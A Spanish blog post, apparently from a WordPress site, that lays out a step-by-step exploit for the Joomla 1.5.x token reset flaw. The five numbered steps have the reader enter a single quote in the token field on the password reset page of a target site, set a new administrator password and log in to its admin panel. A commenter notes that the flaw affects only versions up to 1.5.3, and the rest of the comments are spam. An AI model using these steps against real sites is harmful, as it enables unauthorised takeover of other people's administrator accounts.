Vulnerabilidad en Joomla 1.5 – Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability

Vulnerabilidad que permite el cambio de la contraseña de administrador, en pocos simples pasos:

1. Ir a la url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Escribir en el campo “token” el siguiente caracter: ‘ y dar click en SUBMIT

3. Escribir el nuevo password para admin

Bingo!!
4. Ir a la url del sitio : target.com/administrator/
5. Loguearse como admin con el nuevo password
Conclusión: la de siempre, parchar y mantener actualizado su Joomla, o en su defecto cambiar por otras alternativas XD
Saludos
Fuente:
Anuncios
    • Nomade Informatico
    • 30/03/12

    Esta vulnerabilidad es valida hasta la version 1.5.3 (2008). Desde la 1.5.4 la vulnerabilidad ya esta parchada y ya vamos en la 1.5.25.
    Saludos

  1. Gracias por la info como puedo saber si es 1.5.3 ? 🙂

  2. I reckon something genuinely special in this web site.

  3. Really Cool! Your points are well made.

  4. Your websites really makes me think. I will bookmark this blogs.

  5. Great tips and very easy to understand. You should be thanked more often. So thank you!! Thanks for posting this magnificent page. Spot on with this. You have brought up a very superb points

  1. No trackbacks yet.

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: